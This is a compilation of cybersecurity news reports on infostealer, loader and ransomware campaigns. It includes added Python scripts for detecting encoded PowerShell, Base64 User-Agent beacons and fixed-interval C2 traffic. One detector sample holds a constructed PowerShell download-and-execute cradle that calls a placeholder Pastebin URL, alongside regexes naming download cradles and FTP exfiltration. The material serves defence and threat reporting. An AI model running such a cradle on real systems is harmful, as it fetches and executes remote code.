Malicious GitHub PoC Exploit Spreads Infostealer Malware

A malicious GitHub repository posing as a proof-of-concept (PoC) exploit for CVE-2024-49113, also known as "LDAPNightmare," delivers infostealer malware that sends sensitive data to an external FTP server. Because it looks like a legitimate PoC, the repository tricks users into executing the malware themselves.

While using fake PoC exploits is not a new tactic, Trend Micro's discovery shows that cybercriminals continue to deceive unsuspecting users. This malicious repository appears to be a fork of SafeBreach Labs' original PoC for CVE-2024-49113, which was released on January 1, 2025.

CVE-2024-49113 is one of two vulnerabilities affecting the Windows Lightweight Directory Access Protocol (LDAP) that Microsoft patched in December 2024's Patch Tuesday. The other vulnerability, CVE-2024-49112, is a critical remote code execution (RCE) flaw.

SafeBreach's blog post initially mislabeled the vulnerability as CVE-2024-49112, which sparked interest in LDAPNightmare, potentially attracting threat actors looking to exploit this buzz.

The PoC from the malicious repository contains a UPX-packed executable, 'poc.exe,' which drops a PowerShell script in the victim's %Temp% folder upon execution. The script sets up a scheduled job that runs an encoded script, which fetches another script from Pastebin.

This final payload gathers information such as computer details, process lists, network data, and installed updates, which it then compresses into a ZIP file and uploads to an external FTP server using hardcoded credentials.
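The chain described above (a scheduled job running an encoded PowerShell script that fetches a stage from Pastebin and exfiltrates over FTP) is something a defender can triage from process-creation telemetry. The following is an added example, not code from the original post or from Trend Micro: it decodes `-EncodedCommand` payloads and matches the post's indicators; the command lines are constructed and the Pastebin path is a placeholder.

```python
"""Decode PowerShell -EncodedCommand payloads from process-creation command
lines and flag the pattern the post describes: an encoded script that pulls a
stage from Pastebin and ships data over FTP.
Added example, not code from the original post or from Trend Micro; the
command lines below are constructed and the Pastebin path is a placeholder."""
import base64
import re
from typing import Optional

# -EncodedCommand is usually abbreviated; powershell.exe accepts -e, -ec, -enc.
ENC_FLAG = re.compile(r"(?:^|\s)[-/]e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

# Indicators drawn from the post's description of the stage-two script.
INDICATORS = {
    "pastebin": re.compile(r"pastebin\.com", re.I),
    "ftp": re.compile(r"ftp://|FtpWebRequest|\bUploadFile\b", re.I),
    "cradle": re.compile(r"DownloadString|Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b", re.I),
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded one.

    powershell.exe expects Base64 over UTF-16LE text, so the bytes are decoded
    that way; anything that is not valid Base64/UTF-16 yields None.
    """
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline: str) -> dict:
    """Score one command line: decode if needed, then match indicators."""
    decoded = decode_encoded_command(cmdline)
    text = decoded if decoded is not None else cmdline
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    # A download cradle paired with a paste site or FTP is the post's chain;
    # an encoded cradle on its own is still worth an analyst's look.
    suspicious = ("cradle" in hits and ("pastebin" in hits or "ftp" in hits)) \
        or (decoded is not None and "cradle" in hits)
    return {"encoded": decoded is not None, "decoded": decoded,
            "hits": hits, "suspicious": suspicious}


def encode_for_powershell(script: str) -> str:
    """Build the -EncodedCommand form so the constructed sample is self-contained."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: one modelled on the post's scheduled job, one benign.
SAMPLE_CMDLINES = [
    "powershell.exe -NoP -W Hidden -enc " + encode_for_powershell(
        "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PLACEHOLDER')"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(triage(line))
```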

Users downloading PoCs from GitHub should exercise caution, trusting only reputable cybersecurity firms and researchers. Verifying repository authenticity and reviewing code before execution is essential. For added security, consider uploading binaries to VirusTotal and avoid anything that appears obfuscated.

Improved ViperSoftX Malware Distributed Through eBooks

Researchers have found new advancements in the ViperSoftX info-stealing malware, which was first discovered in 2020. The malware has become more sophisticated, using advanced techniques to avoid detection. One of its new methods is using the Common Language Runtime (CLR) to run PowerShell commands from within AutoIt scripts, which are spread through pirated eBooks. This approach lets the malware hide within normal system activity, making it harder for security software to detect.

How ViperSoftX Spreads

ViperSoftX spreads through torrent sites by pretending to be eBooks. The infection starts when users download a RAR archive that includes a hidden folder, a deceptive shortcut file that looks like a harmless PDF or eBook, and a PowerShell script. The archive also contains AutoIt.exe and AutoIt script files disguised as simple JPG image files. When a user clicks the shortcut file, it sets off a series of commands, starting with listing the contents of “zz1Cover4.jpg.” These commands are hidden within blank spaces and executed by PowerShell, performing various malicious actions.

What the Malware Does

According to researchers from Trellix, the PowerShell code performs several tasks, such as unhiding the hidden folder, calculating the total size of all disk drives, and setting up Windows Task Scheduler to run AutoIt3.exe every five minutes after the user logs in. This ensures the malware remains active on infected systems. Additionally, the malware copies two files to the %APPDATA%\Microsoft\Windows directory, renaming them to .au3 and AutoIt3.exe.

A sneaky aspect of ViperSoftX is its use of CLR to run PowerShell within AutoIt, a tool normally trusted by security software for automating Windows tasks. This allows the malware to avoid detection. ViperSoftX also uses heavy obfuscation, including Base64 encoding and AES encryption, to hide commands in the PowerShell scripts extracted from image decoy files. This makes it difficult for researchers and analysis tools to understand what the malware does.

Additionally, ViperSoftX tries to modify the Antimalware Scan Interface (AMSI) to bypass security checks. By using existing scripts, the malware developers can focus on improving their evasion tactics.

The malware's network activity shows it tries to blend its traffic with legitimate system activity. Researchers noticed it uses deceptive hostnames, like security-microsoft[.]com, to appear more trustworthy and trick victims into thinking the traffic is from Microsoft. Analysis of a Base64-encoded User-Agent string revealed detailed system information gathered from infected systems, such as disk volume serial numbers, computer names, usernames, operating system versions, antivirus product information, and cryptocurrency details.
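The Base64-encoded User-Agent described above is detectable from proxy logs because a browser User-Agent is never a bare Base64 token. The following is an added example, not code from the original post or from Trellix: it decodes candidate User-Agents and flags those that decode to host-fingerprint text; the log lines and the fingerprint contents are constructed, and the lookalike host is the one the post names.

```python
"""Detect User-Agent headers that are Base64-wrapped host fingerprints, the
beaconing trick the post attributes to ViperSoftX. Added example, not code from
the original post or from Trellix; the proxy log lines and the fingerprint
contents are constructed."""
import base64
import re
import string

# A real browser UA has spaces, slashes and parentheses; a bare Base64 token
# of meaningful length is the first thing to test.
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
PRINTABLE = set(string.printable) - {"\x0b", "\x0c"}
# Field types the post says were found in the decoded string.
FINGERPRINT_HINTS = re.compile(
    r"Microsoft Windows|Windows \d|Serial|Volume|Defender|Antivirus|Wallet", re.I)


def decode_user_agent(ua: str):
    """Return decoded text when the UA is clean Base64 over printable text."""
    if not B64_TOKEN.match(ua):
        return None
    try:
        text = base64.b64decode(ua, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None  # random bytes or padding errors: not a fingerprint
    return text if text and all(ch in PRINTABLE for ch in text) else None


def is_fingerprint_beacon(ua: str) -> bool:
    """Two or more host-fingerprint hints in the decoded UA is the signal."""
    text = decode_user_agent(ua)
    return bool(text) and len(FINGERPRINT_HINTS.findall(text)) >= 2


def scan_log(text: str) -> list:
    """Constructed log format: src host method path "user-agent"."""
    row = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')
    findings = []
    for line in text.splitlines():
        m = row.match(line)
        if m and is_fingerprint_beacon(m.group(5)):
            findings.append({"src": m.group(1), "host": m.group(2),
                             "decoded": decode_user_agent(m.group(5))})
    return findings


# Constructed fingerprint shaped like the fields the post lists.
FAKE_UA = base64.b64encode(
    b"WIN-A1B2C3|jdoe|Microsoft Windows 10 Pro|Volume A1B2-C3D4|Windows Defender").decode()
# Constructed log: the lookalike host from the post, a normal browser UA, and
# a Base64 token that decodes to non-text bytes (must not be flagged).
SAMPLE_LOG = "\n".join([
    '10.0.0.5 security-microsoft[.]com GET /api/v1/ "' + FAKE_UA + '"',
    '10.0.0.5 www.example.org GET /index.html "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '10.0.0.7 cdn.example.net GET /lib.js "' + base64.b64encode(bytes(range(256))).decode() + '"',
])

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```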

Researchers warn that ViperSoftX is becoming more dangerous. Its ability to perform malicious actions while avoiding traditional security measures makes it a serious threat. As ViperSoftX continues to evolve, it's essential for users to stay alert and use strong security practices to protect their systems from such advanced threats.


The Surge of FakeBat Malware in Search-Based Malvertising Campaigns


In recent months, cybersecurity researchers have observed a concerning surge in search-based malvertising campaigns, with documented incidents nearly doubling compared to previous periods. Amid this uptick, one malware variant in particular has captured the attention of experts: FakeBat.

FakeBat has emerged as a significant player in malvertising campaigns, and its distribution technique sets it apart from conventional malware strains: it is delivered as MSIX installers bundled with heavily obfuscated PowerShell code. This approach lets threat actors orchestrate complex attacks while evading traditional detection methods.

Recent iterations of the malware show a shift towards more advanced redirection tactics. In addition to the URL and analytics shorteners it has always abused, FakeBat now employs dual redirection, also routing victims through subdomains of compromised legitimate websites. By exploiting the credibility of these compromised domains, threat actors circumvent detection mechanisms and increase the success rate of their attacks.

Targeting has also changed. Traditionally, malvertising campaigns impersonated specific software brands; the latest wave of FakeBat attacks has diversified, with threat actors now impersonating a wide range of brands and posing a greater threat to businesses and individuals alike. Current FakeBat campaigns frequently impersonate OneNote, Epic Games, Ginger, and the Braavos smart wallet application, and the malicious domains are often hosted on Russian-based infrastructure, which further complicates detection and mitigation.

Despite ongoing efforts to detect and mitigate FakeBat, threat actors continue to evolve their tactics and payloads. Upon execution, a standardized PowerShell script connects to the attacker's command and control server, allowing the threat actors to catalog victims for future exploitation.

Defending against FakeBat and other search-based malvertising threats requires a multifaceted approach. Blocking malicious payloads is crucial, but addressing the supporting infrastructure is harder. Implementing robust ad-blocking policies, such as ThreatDown DNS Filter, can thwart malvertising attacks at their source.

Organizations must nonetheless remain vigilant and continually adapt their defenses as search-based malvertising evolves. Understanding the nuances of emerging malware variants like FakeBat, applying tested mitigation measures, and collaborating with industry partners is essential to safeguarding digital assets against these threats.

Novel GootLoader Malware Strain Bypasses Detection and Spreads Quickly


GootBot, a new variant of the GootLoader malware, has been found to enable lateral movement on compromised systems while avoiding detection.

Golo Mühr and Ole Villadsen of IBM X-Force said that the GootLoader group introduced their own custom bot into the final stages of their attack chain in an effort to evade detection while employing commercial C2 tools like CobaltStrike or RDP.

"This new variant is a lightweight but effective malware allowing attackers to rapidly spread throughout the network and deploy further payloads," the researchers explained. 

As its name suggests, GootLoader is a malware that can lure in potential victims by employing search engine optimisation (SEO) poisoning techniques, and once inside, it can download more sophisticated malware. It is linked to a threat actor known as UNC2565, also tracked as Hive0127. 

The use of GootBot suggests a change in strategy away from post-exploitation frameworks like CobaltStrike, with the implant being downloaded as a payload following a GootLoader infection.

GootBot, which is described as an obfuscated PowerShell script, is designed to connect to a compromised WordPress website that serves as its command and control (C2) and to receive commands from it. The use of a different hard-coded C2 server in every dropped GootBot sample complicates matters further and makes it challenging to block the malicious traffic.

"Currently observed campaigns leverage SEO-poisoned searches for themes such as contracts, legal forms, or other business-related documents, directing victims to compromised sites designed to look like legitimate forums where they are tricked into downloading the initial payload as an archive file," the researchers added.

An obfuscated JavaScript file included in the archive file is executed by a scheduled task to retrieve another JavaScript file for persistence. 

In the second stage, the JavaScript executes a PowerShell script that collects system information and exfiltrates it to a remote server. The server then responds with another PowerShell script that runs indefinitely and gives the threat actor the ability to deploy further payloads.

Among them is GootBot, which beacons to its C2 server once every 60 seconds to retrieve PowerShell tasks to execute and returns the results of the execution to the server in HTTP POST requests. GootBot's other capabilities include reconnaissance and lateral movement, which let it effectively increase the attack's reach.
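The 60-second check-in described above leaves a timing signature in proxy logs. The following is an added example, not code from the original post or from IBM X-Force: the log is constructed, with wp.example standing in for a compromised WordPress site, and the detector flags any source/host pair whose request gaps are regular (low jitter), which is what separates a beacon from ordinary browsing to the same host.

```python
"""Surface fixed-interval HTTP beaconing, like GootBot's 60-second C2
check-in, from proxy logs. Added example, not IBM X-Force's or the malware's
code; the log lines, hosts and timestamps below are constructed."""
from collections import defaultdict
from datetime import datetime
import statistics

# Constructed proxy log: "<ISO timestamp> <src> <method> <host> <path>".
# wp.example plays the compromised WordPress C2; www.example.org is browsing.
SAMPLE_LOG = """\
2024-01-01T10:00:00 10.0.0.5 POST wp.example /wp-content/uploads/x.php
2024-01-01T10:00:07 10.0.0.5 GET www.example.org /news
2024-01-01T10:00:09 10.0.0.5 GET www.example.org /news/style.css
2024-01-01T10:00:10 10.0.0.5 GET www.example.org /news/logo.png
2024-01-01T10:01:01 10.0.0.5 POST wp.example /wp-content/uploads/x.php
2024-01-01T10:01:59 10.0.0.5 POST wp.example /wp-content/uploads/x.php
2024-01-01T10:02:31 10.0.0.5 GET www.example.org /news/archive
2024-01-01T10:03:00 10.0.0.5 POST wp.example /wp-content/uploads/x.php
2024-01-01T10:04:02 10.0.0.5 POST wp.example /wp-content/uploads/x.php
2024-01-01T10:04:40 10.0.0.5 POST www.example.org /search
2024-01-01T10:04:41 10.0.0.5 GET www.example.org /search?q=forms
2024-01-01T10:04:59 10.0.0.5 POST wp.example /wp-content/uploads/x.php
2024-01-01T10:06:00 10.0.0.5 POST wp.example /wp-content/uploads/x.php
"""


def parse_log(text: str) -> list:
    """Parse the constructed format into (timestamp, src, method, host)."""
    events = []
    for line in text.splitlines():
        ts, src, method, host, _path = line.split()
        events.append((datetime.fromisoformat(ts), src, method, host))
    return events


def find_beacons(events: list, min_count: int = 5, max_jitter: float = 0.15) -> dict:
    """Return src/host pairs whose inter-request gaps are nearly constant.

    Jitter is the coefficient of variation of the gaps (stdev / mean); a human
    browsing the same site produces bursts and long pauses, a timer does not.
    """
    by_pair = defaultdict(list)
    for ts, src, _method, host in events:
        by_pair[(src, host)].append(ts)
    beacons = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_count:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        jitter = statistics.pstdev(gaps) / mean
        if jitter <= max_jitter:
            beacons[pair] = {"count": len(stamps),
                             "interval": round(statistics.median(gaps)),
                             "jitter": round(jitter, 3)}
    return beacons


if __name__ == "__main__":
    for pair, stats in find_beacons(parse_log(SAMPLE_LOG)).items():
        print(pair, stats)
```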

Ransomware Actor Linked to Attacks Against Citrix NetScaler System


Unpatched Citrix NetScaler systems are being compromised in domain-wide attacks by a threat actor, believed to be linked to the FIN8 group, that exploits the CVE-2023-3519 remote code execution vulnerability.

Sophos has been monitoring this campaign since mid-August and has observed the threat actor performing payload injections, using BlueVPS hosting for malware distribution, delivering obfuscated PowerShell scripts, and dropping PHP webshells on victim machines.

The similarities to another operation spotted earlier this summer by Sophos experts have led the analysts to conclude that the two actions are linked, with the threat actor specialising in ransomware attacks. 

CVE-2023-3519 is a critical-severity (CVSS score: 9.8) code injection vulnerability in Citrix NetScaler ADC and NetScaler Gateway that was identified in mid-July 2023 as an actively exploited zero-day. 

The vendor issued security updates to address the issue on July 18th. However, there was evidence that criminals had been selling an exploit for the bug since at least July 6th, 2023.

Shadowserver reported finding 640 webshells in an equivalent number of infected Citrix servers on August 2nd, and Fox-IT increased that total to 1,952 two weeks later. 

In mid-August, more than a month after the security update became available, approximately 31,000 Citrix NetScaler instances were still vulnerable to CVE-2023-3519, offering threat actors plenty of room for attacks.

A threat actor identified by Sophos X-Ops as "STAC4663" is reportedly exploiting CVE-2023-3519, and the researchers believe that this is a part of the same campaign that Fox-IT previously reported on earlier this month. 

Analysis of the recent attacks' payload, which is injected into "wuauclt.exe" or "wmiprvse.exe," is still ongoing. However, Sophos believes that it is a link in a chain of ransomware attacks based on the attacker's profile. 

According to Sophos, the campaign is possibly linked to the FIN8 hacking group, which was recently identified as delivering the BlackCat/ALPHV ransomware. This attribution, and the link to the ransomware actor's previous campaign, is based on domain discovery, plink, BlueVPS hosting, unique PowerShell scripting, and the use of PuTTY Secure Copy (pscp).

Finally, the attackers employ a C2 IP address (45.66.248[.]189) for malware staging, as well as a second C2 IP address (85.239.53[.]49) that responds to the same C2 software as in the prior campaign. To assist defenders in detecting and stopping the attack, Sophos has published a list of IoCs (indicators of compromise) for this campaign on GitHub.

Global Ransomware Attack Targets VMware ESXi Servers



Cybersecurity firms around the world have recently warned of an increase in cyberattacks, particularly those targeting corporate banking clients and computer servers. The Italian National Cybersecurity Agency (ACN) recently reported a global ransomware hacking campaign that targeted VMware ESXi servers, urging organisations to take action to protect their systems.

In addition, Italian cybersecurity firm Cleafy researchers Federico Valentini and Alessandro Strino reported an ongoing financial fraud campaign since at least 2019 that leverages a new web-inject toolkit called drIBAN. The main goal of drIBAN fraud operations is to infect Windows workstations inside corporate environments, altering legitimate banking transfers performed by the victims and transferring money to an illegitimate bank account.

These accounts are either controlled by the threat actors or their affiliates, who are then tasked with laundering the stolen funds. The fraudulent transactions are often realized by means of a technique called Automated Transfer System (ATS) that's capable of bypassing anti-fraud systems put in place by banks and initiating unauthorized wire transfers from a victim's own computer.

The operators behind drIBAN have become more adept at avoiding detection and developing effective social engineering strategies, in addition to establishing a foothold for long periods in corporate bank networks. Furthermore, there are indications that the activity cluster overlaps with a 2018 campaign mounted by an actor tracked by Proofpoint as TA554 targeting users in Canada, Italy, and the U.K.

Organisations need to be aware of these threats and take immediate action to protect their systems from cyberattacks. The ACN has reported that dozens of Italian organisations have been likely affected by the global ransomware attack and many more have been warned to take action to avoid being locked out of their systems.


Evolution of Gootkit Malware Using Obfuscations

Mandiant Managed Defense has consistently responded to GOOTLOADER infections since January 2021. When spreading GOOTLOADER, the threat actors cast a wide net, affecting a variety of industry verticals and geographic regions.

Gootkit Malware

The Gootkit Trojan is JavaScript-based malware that carries out a number of malicious tasks, such as granting threat actors remote access, recording video, capturing keystrokes, stealing emails and passwords, and injecting malicious content into web pages to steal online banking login details.

Gootkit previously spread malware in the disguise of freeware installers, but now it deceives users into downloading these files by presenting them as legal documents. A user enters a search query into a search engine to begin the attack chain. 

Mandiant Managed Defense believes that UNC2565, a group it tracks, is currently the only group operating the GOOTLOADER malware and its infrastructure. Because these intrusions were detected and mitigated quickly, Mandiant's observation of post-compromise GOOTLOADER activity has mostly been limited to internal reconnaissance.

If the GOOTLOADER file is successfully executed, it downloads further payloads such as FONELAUNCH and Cobalt Strike BEACON or SNOWCONE, which are stored in the registry. In later stages, PowerShell is used to execute these payloads.

The .NET-based loader FONELAUNCH is designed to load an encoded payload into memory, while the downloader SNOWCONE is responsible for retrieving next-stage payloads, notably IcedID, over HTTP.

The primary aims of Gootkit have remained the same, but the attack process has undergone substantial modifications. Currently, the JavaScript file in the ZIP archive is a trojanized library that embeds a second, obfuscated JavaScript file, which in turn executes the malware.

Furthermore, to avoid detection, the malware's creators have used three distinct strategies to cloak Gootkit, including hiding the code inside modified versions of trusted JavaScript libraries such as jQuery, Chroma.js, and Underscore.js. These changes show that UNC2565 continues to actively develop and expand its capabilities.


Cheerscrypt Spyware Attributed to Chinese APT Entity

The Emperor Dragonfly Chinese hacking group, notorious for frequently switching between ransomware families to avoid detection, has been connected to the Cheerscrypt ransomware.

The attacks were linked by the cybersecurity company Sygnia to a threat actor also dubbed Bronze Starlight and DEV-0401. The hacking gang seems to be a ransomware operation, but past research suggests that the Chinese government is interested in many of its victims.

Cheerscrypt is the most recent addition to a long list of ransomware families the gang has used, including LockFile, Atom Silo, Rook, Night Sky, Pandora, and LockBit 2.0, all in a little over a year.

Recently, Sygnia researched a Cheerscrypt ransomware operation that utilized Night Sky ransomware TTPs. The attackers then dropped a Cobalt Strike beacon linked to a C2 address formerly tied to Night Sky operations. 

The Cheerscrypt ransomware family, which Trend Micro first analyzed in May 2022, was built from the Babuk ransomware source code that was leaked online in June 2021. Cheerscrypt is one of several ransomware families used by the APT group. Unlike other ransomware gangs, DEV-0401 directly oversees every stage of the attack chain, from initial access to data theft, and does not rely on a network of affiliates.

In January 2022 attacks, the hackers exploited the critical Log4Shell vulnerability in Apache Log4j to gain initial access to VMware Horizon servers. They then dropped a PowerShell payload that delivered an encrypted Cobalt Strike beacon. Alongside the beacon, the hackers also deployed three Go-based tools: a keylogger that sent keystrokes to Alibaba Cloud, a customized version of the internet proxy tool iox, and the tunneling program NPS.

Trend Micro initially identified Cheerscrypt in May 2022, highlighting its capacity to target VMware ESXi servers as a component of a tried-and-true strategy known as double extortion to force its victims into paying the ransom or risk having their data exposed.

The hackers break into networks, take information, and encrypt devices just like other ransomware groups that target businesses. The victim is then coerced into paying a ransom through double-extortion methods using the data. The stolen data is posted on a data leak website when a ransom is not paid.

A PowerShell payload that can deliver an encrypted Cobalt Strike beacon has been dropped on VMware Horizon servers by infection chains that have exploited the major Log4Shell vulnerability in the Apache Log4j library.

Cheerscrypt and Emperor Dragonfly share initial access vectors, and lateral movement strategies, including the use of DLL side-loading to distribute the encrypted Cobalt Strike beacon. Notably, the ransomware gang is acting as a 'lone wolf' separated from the rest of the cybercrime community rather than as a RaaS (Ransomware-as-a-Service) platform for affiliates.